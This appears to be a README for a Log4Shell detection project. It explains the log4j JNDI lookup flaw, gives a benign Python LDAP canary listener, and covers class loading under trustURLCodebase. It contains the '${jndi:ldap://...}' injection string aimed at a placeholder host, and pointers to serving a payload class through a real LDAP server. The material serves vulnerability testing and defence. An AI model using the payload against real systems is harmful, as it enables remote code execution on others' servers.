If an attacker manages to get the string ${jndi:ldap://someaddresshere/param1=value1} logged by a vulnerable log4j, the JNDI lookup inside the message connects to the attacker-controlled LDAP server, and the reference that server returns can make the JVM fetch and load Java bytecode from a codebase the attacker chooses. That bytecode runs inside the victim's process, so it can
execute any malicious code or do some little trolling.
Take this with a grain of salt, I'm not a security expert.
inb4:
Log4Shell.mp4
Detection: a simple socket listening on port 1389 that closes the connection as soon as a client connects is enough to see whether the target performs the lookup, with no external dependency.
-
Note: this is not always conclusive. Sometimes the target does not bother to load the class from the URL given by the LDAP server, so a connection only proves that the lookup happened.
On the victim side, a vulnerable target will throw an error once the connection is closed on it.
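The listener described above, as an added example that is not part of this project's code. It is a canary only: it records who connected and the first bytes they sent, then closes the socket, so nothing can ever be loaded from it. The sample BindRequest bytes used for the self-test are hand-built (an anonymous LDAPv3 bind, the shape the JDK's JNDI client sends right after connecting); the host, port and class names are mine.

```python
import socket
import threading
import time
from datetime import datetime, timezone

# The JDK's JNDI LDAP client opens the TCP connection and immediately sends a
# BER-encoded LDAP BindRequest, which begins with a SEQUENCE tag (0x30).
LDAP_SEQUENCE_TAG = 0x30

# Constructed sample: anonymous LDAPv3 BindRequest, messageID 1.
#   SEQUENCE { INTEGER 1, [APPLICATION 0] { INTEGER 3, OCTET STRING "", [0] "" } }
SAMPLE_BIND_REQUEST = bytes.fromhex("300c020101600702010304008000")


def record_hit(peer, first_bytes):
    """Build a record for one inbound connection."""
    return {
        "time": datetime.now(timezone.utc).isoformat(),
        "ip": peer[0],
        "port": peer[1],
        "first_bytes": first_bytes,
        "looks_like_ldap": first_bytes[:1] == bytes([LDAP_SEQUENCE_TAG]),
    }


class LdapCanary:
    """Accept connections, record the peer and its first bytes, then close.

    It never speaks LDAP, so nothing can be loaded from it; a hit is evidence
    only that the target performed the JNDI lookup, not that it would load a
    remote class.
    """

    def __init__(self, host="0.0.0.0", port=1389):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(16)
        self.sock.settimeout(0.2)          # lets the accept loop notice stop()
        self.port = self.sock.getsockname()[1]   # real port when port=0 was asked
        self.hits = []
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def start(self):
        self._thread.start()
        return self

    def stop(self):
        self._stop.set()
        self._thread.join(timeout=2)
        self.sock.close()

    def _serve(self):
        while not self._stop.is_set():
            try:
                conn, peer = self.sock.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            with conn:
                conn.settimeout(1.0)
                try:
                    first = conn.recv(64)
                except (socket.timeout, OSError):
                    first = b""
                self.hits.append(record_hit(peer, first))
            # leaving the `with` closes the connection; on a vulnerable target
            # the JNDI lookup now fails with a javax.naming exception


def send_probe(port, data, host="127.0.0.1"):
    """Connect to the canary and send `data` (used to self-test the listener)."""
    with socket.create_connection((host, port), timeout=2) as s:
        s.sendall(data)


def wait_for_hits(canary, count, timeout=5.0):
    """Poll until the canary has recorded `count` hits or `timeout` passes."""
    deadline = time.monotonic() + timeout
    while len(canary.hits) < count and time.monotonic() < deadline:
        time.sleep(0.05)
    return list(canary.hits)


if __name__ == "__main__":
    canary = LdapCanary(port=1389).start()
    print(f"canary listening on {canary.port}; point the jndi:ldap:// payload at this host")
    seen = 0
    try:
        while True:
            hits = wait_for_hits(canary, seen + 1, timeout=60)
            for hit in hits[seen:]:
                print(hit)
            seen = len(hits)
    except KeyboardInterrupt:
        canary.stop()
```

Run it on a host the target can reach and use that host and port in the payload string. A hit whose first byte is 0x30 is almost certainly the JDK's LDAP client; a hit with other bytes is some other scanner or client hitting the port.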
To go further, use the com.unboundid:unboundid-ldapsdk
library to host a real LDAP server that answers the lookup.
When the string is logged by both the sender and the receiver, both of them perform the lookup, which means both are affected.
-
Java doing the LDAP lookup does not by itself mean the target is always vulnerable to RCE; if it then loads the class from the codebase the server provided, it is.
-
To test whether it is actually vulnerable to RCE, serve a harmless payload class (one that only writes a marker to the log, for example); if the payload runs, the target is vulnerable.
-
If the
com.sun.jndi.ldap.object.trustURLCodebase
system property is set to true,
the JVM will load classes from the remote codebase and you are vulnerable, like really. If it is false (the default since Java 8u191), remote classes are not loaded through this path, but the attacker can still use classes that already exist on the classpath (for example through deserialization of an object the LDAP server returns).
-
If you look at the victim's log and see this:
Caused by: java.lang.ClassNotFoundException: itzbenz.payload.ObjectPayloadSerializable
at java.net.URLClassLoader.findClass(Unknown Source)
at java.lang.ClassLoader.loadClass(Unknown Source)
at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source)
at java.lang.ClassLoader.loadClass(Unknown Source)
then the JVM did not load the class from the attacker's codebase: it fell back to the local classpath, did not find the class there, and threw ClassNotFoundException. That is the trustURLCodebase=false case. It is safer, not safe: the application still performs an attacker-controlled LDAP lookup, which is a large attack surface (outbound connections on demand, plus whatever is already on the classpath).
Note: after updating Java 8, the Minecraft server seems not to load the classpath.
This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.